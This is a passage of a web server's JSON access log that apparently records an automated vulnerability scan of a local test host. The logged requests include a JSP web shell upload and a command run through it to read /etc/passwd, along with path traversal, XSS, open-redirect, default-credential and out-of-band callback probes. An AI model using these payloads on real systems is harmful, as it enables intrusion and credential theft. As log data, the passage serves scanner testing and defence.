HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22prom-operator\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"{\x22test_type\x22:\x22ip\x22,\x22test_debug\x22:false,\x22ipnotify_type\x22:\x22http/get\x22,\x22ipnotify_address\x22:\x22http://c9v8hn0smpv8c57g0t00xkcsu8yfhps7x.oast.live\x22,\x22ipnotify_username\x22:\x22\x22,\x22ipnotify_password\x22:\x22\x22,\x22ipnotify_port\x22:\x220\x22,\x22ipnotify_content_type\x22:\x22\x22,\x22ipnotify_template\x22:\x22\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%\x0D\x0Aif (request.getParameter(\x22cmd\x22) != null) {\x0D\x0A out.println(\x22Command: \x22 + request.getParameter(\x22cmd\x22) + \x22
\x22);\x0D\x0A Process p = Runtime.getRuntime().exec(request.getParameter(\x22cmd\x22));\x0D\x0A OutputStream os = p.getOutputStream();\x0D\x0A InputStream in = p.getInputStream();\x0D\x0A DataInputStream dis = new DataInputStream(in);\x0D\x0A String disr = dis.readLine();\x0D\x0A while ( disr != null ) {\x0D\x0A out.println(disr);\x0D\x0A disr = dis.readLine();\x0D\x0A }\x0D\x0A }\x0D\x0A%>\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /poc.jsp/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wt2parser.cgi?home_en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0a/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /thruk/cgi-bin/login.cgi?thruk/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0d/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/splunkd/__raw/services/server/info/server-info?output_mode=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%00/example.com/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"password=12345","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__raw/services/server/info/server-info?output_mode=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bolt/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.gz HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/..;/css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug/pyspidervulntest/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /druid/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CGI/Java/Serviceability?adapter=device.statistics.configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /v1/kv/297MbKqZCaore7tAzPbwNtFivan HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CF_SFSD/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //http://127.0.0.1example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/kv/297MbKqZCaore7tAzPbwNtFivan?raw HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide-scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hub/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data?get=prodServerGen HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.png 